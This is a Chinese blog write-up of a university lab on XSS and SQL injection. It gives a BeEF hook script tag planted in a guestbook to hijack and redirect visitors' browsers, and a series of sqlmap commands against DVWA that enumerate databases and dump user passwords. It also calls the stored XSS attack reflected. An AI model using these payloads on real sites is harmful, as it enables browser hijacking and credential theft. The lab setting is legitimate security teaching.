网络渗透实验三,XSS和SQL注入

已于 2023-12-27 22:53:29 修改
阅读量879 收藏 12
点赞数 26
文章标签: 网络 安全
于 2023-12-27 22:46:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dalungame/article/details/135250006
版权

实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。

系统环境:Kali Linux 2、Windows Server

网络环境:交换网络结构

实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

2.实验步骤:

XSS部分:利用Beef劫持被攻击者客户端浏览器。

实验环境搭建。

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)

攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);

被攻击者:访问留言簿网站,浏览器被劫持。

  1. 利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。

2、 Kali使用beef生成恶意代码,截图。

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,

<script src="http://Kali的IP地址:3000/hook.js"></script>,截图。

进入beef,等待目标靶机点击查看你的留言之后,将会在online browsers弹出

此时,目标客户端浏览器已被劫持

4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。

在Current Browser项选择command 然后选Browser,点击Hooked Domain选择Redirect Browser,在右边的Redirect URL中输入网址,即可控制浏览器跳转到目标网址

5、回答问题:实验中XSS攻击属于哪种类型?

XSS攻击有哪几种类型?

常见的 XSS 攻击有三种:反射型XSS攻击、DOM-based 型XXS攻击以及存储型XSS攻击。

这个实验属于反射型XSS攻击:

反射型 XSS 一般是攻击者通过特定手法(如电子邮件),诱使用户去访问一个包含恶意代码的 URL,当受害者点击这些专门设计的链接的时候,恶意代码会直接在受害者主机上的浏览器执行。反射型XSS通常出现在网站的搜索栏、用户登录口等地方,常用来窃取客户端 Cookies 或进行钓鱼欺骗。

SQL注入部分:DVWA+SQLmap+Mysql注入实战

实验环境搭建。启动Metasploitable2虚拟机。

1、注入点发现。首先肯定是要判断是否有注入漏洞。

扫描子网,得到Metasploitable2的IP,打开DVWA

 将DVWA安全级别设置为最低;

在输入框输入1,返回

ID: 1

First name: admin

Surname: admin

返回正常;

再次输入1',报错,返回

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

此时可以断定有SQL注入漏洞,
 

下面利用SQLMap进行注入攻击。

2、枚举当前使用的数据库名称和用户名。

直接在网页鼠标右键检查,得到cookie:

security=low; PHPSESSID=c96a14462139be50890f08a39e3d9ee8

你输入的命令:

sqlmap -u "http://192.168.3.36/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=c96a14462139be50890f08a39e3d9ee8' -b  --current-db  --current-user

Sqlmap输出截图:

得到数据库是dvwa,用户是root@%

3、枚举数据库用户名和密码

你输入的命令:

sqlmap -u "http://192.168.3.36/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=c96a14462139be50890f08a39e3d9ee8' --string="Surname" --users --password

Sqlmap输出截图。

4、枚举数据库

--dbs:枚举当前数据库

你输入的命令:

sqlmap -u "http://192.168.3.36/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=c96a14462139be50890f08a39e3d9ee8' --string="Surname" --dbs

Sqlmap输出截图。

5、枚举数据库和指定数据库的数据表

 -D 数据库名:指定数据库

--tables:枚举指定数据库的所有表

你输入的命令:

   sqlmap -u "http://192.168.3.36/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=c96a14462139be50890f08a39e3d9ee8' --string="Surname" -D dvwa --tables

Sqlmap输出截图。

6、获取指定数据库和表中所有列的信息

-D:指定的数据库

-T:指定数据库中的数据表

--columns:获取列的信息

你输入的命令:

sqlmap -u "http://192.168.3.36/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=c96a14462139be50890f08a39e3d9ee8' --string="Surname" -D dvwa -T users --columns

Sqlmap输出截图。

7、枚举指定数据表中的所有用户名与密码,并down到本地。

-C:枚举数据表中的列

--dump:存储数据表项

你输入的命令:

sqlmap -u "http://192.168.3.36/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=c96a14462139be50890f08a39e3d9ee8' --string="Surname" -D dvwa -T users -C user,password --dump

Sqlmap输出截图。

查看down到本地的用户名与密码,截图。(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。)

dalungame
关注
  • 26
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSSSQL注入
LJW_wenjingli7的博客
01-22 358
答:XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。通过实验我了解到xsssql注入的概念和基本实践,做这个实验也遇到了很多困难,比如建立网站如何设置,排除输入的问题,beef恶意代码的逆向攻击等都考验我的实际操作,好几串sql注入语句也是让我困惑,难以理解,尝试多了,到最后套用现成语句居然得心应手了。了解XSS攻击实施,理解防御XSS攻击的方法;设置密码后自动跳转beef网站,账号是beef,密码是刚刚设置的密码。
初识XSSSQL注入
m0_47968686的博客
12-03 481
XSSSQL注入 实验原理 ## 1.什么是XSS XSS又叫CSS (Cross Site Script) 也称为跨站,它是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。 ## 2.什么是xss攻击 XSS攻击是指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,由于HTM
实验二、XSSSQL注入
weixin_30525825的博客
05-21 552
一、 实验目的 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 二、 系统环境:Kali Linux2、Windows 三、 网络环境:交换网络结构 四、 实验工具:AWVS(Acunetix Web Vulnar...
实验三 XSSSQL注入
weixin_48647514的博客
12-14 164
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户端浏览器。 实验环境搭建 角色:
xss sql注入
qq_62046696的博客
04-20 489
xss分为 反射型(大部分钓鱼), 存储型(guest book 提交,look message 查看<img>被解析 ,DOM型。 select 1,2 union 2,4 前后要一致 select * from guestbook order by 1 查看有几类字段 然后用联合查询 渲染位,select * from sqlunion where id=9999 union select 1,2 前面没有值后面会进行顶替 database()当前的数据库名 sleep(5)查询
xsssql注入
Coisini的博客
05-22 959
在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修补了简单的XSS漏洞.但是他们所忘记做的是修补比XSS的一个字符串更多的漏洞,并且php中特殊安全机制被用来防御XSS,而取代他们自己的方法.同时我将阐述的不仅仅是XSS,而是所有的web安全. XXXXXX...
网络渗透测试 XSSSQL注入
12-02
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;...系统环境:Kali Linux 2、Windows Server网络环境:交换网络结构实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
网络渗透实验三.docx
01-10
本实验旨在了解网络渗透攻击的基本原理和防御方法,包括 XSS 攻击和 SQL 注入攻击。实验环境使用 Kali Linux 2 和 Windows Server,工具包括 Beef、AWVS 和 SqlMAP。 XSS 攻击部分: * 了解 XSS 攻击的基本原理:...
扫描sql注入xss攻击的牛b工具
11-02
网络安全领域,SQL注入XSS(跨站脚本)攻击是两种常见的威胁,它们针对的是Web应用程序的安全性。本文将详细介绍这两种攻击类型以及相关的防范措施,并介绍一款名为"扫描SQL注射与XSS攻击的牛B工具"的实用工具,...
Web应用安全:简单XSS测试脚本(实验).docx
06-19
简单XSS测试脚本 一、实验目的 了解XSS的有关知识; 了解XSS的实际操作; 了解XSS的攻击原理。 二、实验内容 在主机上搭建pikachu站点; 在站点上进行简单XSS测试脚本。 三、实验内容与步骤 在主机上搭建pikachu站点: 1.1、pikachu站点上集成了许多XSS测试的平台,在这里搭建便于对XSS进行测试,将“pikachu.zip”压缩包解压到phpStudy的WWW文件夹下 1.2、开启phpStudy并开启Apache服务和MySQL数据库。 1.3、根据实际情况修改inc/config.inc.php里面的数据库连接配置,这里我们数据库在之前设置的密码就是root,所以没有改变的话是不用设置的。 1.4、访问/pikachu,会有一个红色的热情提示"欢迎使用,pikachu还没有初始化,点击进行初始化安装!",点击即可完成安装。 在站点上进行简单XSS测试脚本 2.1、点击“Cross-Site Scripting”然后点击反射型XSS(get),打开反射型XSS的测试站点。 2.1.1、看见页面提示“Which NBA player do you lik
XSSSQL注入
qq_51297226的博客
12-15 368
一、 XSS跨站脚本注入实验 实验环境搭建。 角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建) 攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站); 被攻击者:访问留言簿网站,浏览器被劫持。 网站搭建好后就开始用AWVS扫描该网页是否存在XSS漏洞 1、利用AWVS扫描留言簿网站发现其存在XSS漏洞, 2、 Kali使用beef生成恶意代码 在这里使用beef工具时出现了错误,不能使用默认的账号和密码,文件中添加一个账号即可 1 将它写到留言板
xss攻击 SQL注入
最新发布
qq_65208982的博客
06-10 1184
QL注入,是发生于应用程序与数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。SQL 注入一般发生在用户交互场景中,比如需要用户自已输入信息的输入框,或者下拉选择选项的这种,如果不做好输入内容的过滤,就很可能发生 SQL 注入
网络渗透测试实验三 XSSSQL注入
weixin_62599268的博客
11-22 686
网络渗透测试实验三 XSSSQL注入
实验三XSSSQL注入
yghlqgt的博客
11-27 728
试验前需要掌握的知识 下面内容是试验前你需要了解并掌握的知识,详细的内容可以移步到这篇博客中去学习:试验前的知识储备 XSS部分 1、什么是XSS 2 、什么是XSS攻击 3、 什么是Cookie 4、XSS漏洞的分类 5、XSS的防御 SQL注入部分 1、什么是SQL注入攻击 2、为何会有SQL注入攻击 3. 何时使用SQL注入攻击 4、MySQL简介 5、实施SQL注入攻击 6、防范SQL注入方法汇总 实验部分 实验目的: 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入
网络渗透实验三XSSSQL注入
liangtaiwei的博客
12-13 630
1.实验目的 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、WindowsServer 网络环境:交换网络结构 实验工具:Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 2.实验内容、原理 XSS部分:利用Beef劫持被攻击者客户端浏览器..
经典:Web安全XSSSQL注入
jklbnm12的博客
06-24 626
一、前言 近几年,伴随互联网的高速发展,对Web安全问题的重视也越来越高。Web应用所面临的威胁来自很多方面,其中黑客的破坏是影响最大的,黑客利用Web应用程序存在的漏洞进行非法入侵,从而破坏Web应用服务,盗取用户数据等,如何防范漏洞带来的安全威胁是一项艰巨的挑战。 为了增强用户的交互体验,开发者们在Web应用程序中大量应用客户端脚本,使Web应用的内容与功能变得丰富有趣,然而隐藏的安全威胁随之而来,黑客们将Web攻击的思路从服务器端转向了客户端,利用客户端脚本漏洞的攻击变得越来越强大,如跨站脚本
104.[提高班]网络渗透靶场Oracle+phpStudy本地搭建万字详解1
08-03
本篇文章详细讲解了如何利用Oracle数据库和phpStudy搭建一个本地网络渗透靶场,用于学习和实践SQL注入XSS攻击和文件上传漏洞等常见Web安全问题。 首先,Oracle基础介绍部分涵盖了Oracle数据库的基本概念,它是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值